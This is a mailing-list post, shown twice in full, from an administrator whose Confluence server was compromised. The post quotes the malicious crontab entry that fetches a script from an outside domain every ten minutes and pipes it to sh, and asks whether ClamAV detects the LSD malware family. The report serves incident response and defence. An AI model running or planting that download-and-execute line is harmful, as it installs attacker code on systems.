Dear Friends,
We recently faced an Atlassian Confluence issue lately.
Atlassian issued a security advisory the 29/03/2019
<https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html>
.
Following this thread
<https://community.atlassian.com/t5/Confluence-discussions/khugepageds-eating-all-of-the-CPU/td-p/1055337>,
We understood what happened on our server.
Confluence is running in its own user space and have seen its crontab
hacked.
On our Debian Stretch the 'crontab -u confluence -e' shows a non legit
instruction :
*/10 * * * * (curl -fsSL https://dd.heheda.tk/i.jpg||wget -q -O-
https://dd.heheda.tk/i.jpg)|sh
Obviously the security flaw in Confluence open the gate to this behaviour.
As we are running Confluence in its own user space, the i.jpg who contains
the shell script file didn't harm our server. No malwares have been
deployed however the server was shutting down immediately after starting.
We cleaned up the crontab and upgraded Confluence to avoid any further
infection.
However we need to check our installation and I'm wondering if ClamAV knows
already this malware family
<https://git.laucyun.com/security/lsd_malware_clean_tool/blob/master/README.md>.
I already open a report to ClamAV. is there any user who faced this issue
and is ClamAV ready to detect and cleanup our Linux boxes ?
Any pointers about any informations about this LSD Malware family will be
greatly appreciated as I try to evaluate the risks for our infrastructure
(I checked various DB with no success and googled too).
Warmly.
Light
Pudhuveedu / Xavier
PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9
<http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>
We recently faced an Atlassian Confluence issue lately.
Atlassian issued a security advisory the 29/03/2019
<https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html>
.
Following this thread
<https://community.atlassian.com/t5/Confluence-discussions/khugepageds-eating-all-of-the-CPU/td-p/1055337>,
We understood what happened on our server.
Confluence is running in its own user space and have seen its crontab
hacked.
On our Debian Stretch the 'crontab -u confluence -e' shows a non legit
instruction :
*/10 * * * * (curl -fsSL https://dd.heheda.tk/i.jpg||wget -q -O-
https://dd.heheda.tk/i.jpg)|sh
Obviously the security flaw in Confluence open the gate to this behaviour.
As we are running Confluence in its own user space, the i.jpg who contains
the shell script file didn't harm our server. No malwares have been
deployed however the server was shutting down immediately after starting.
We cleaned up the crontab and upgraded Confluence to avoid any further
infection.
However we need to check our installation and I'm wondering if ClamAV knows
already this malware family
<https://git.laucyun.com/security/lsd_malware_clean_tool/blob/master/README.md>.
I already open a report to ClamAV. is there any user who faced this issue
and is ClamAV ready to detect and cleanup our Linux boxes ?
Any pointers about any informations about this LSD Malware family will be
greatly appreciated as I try to evaluate the risks for our infrastructure
(I checked various DB with no success and googled too).
Warmly.
Light
Pudhuveedu / Xavier
PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9
<http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>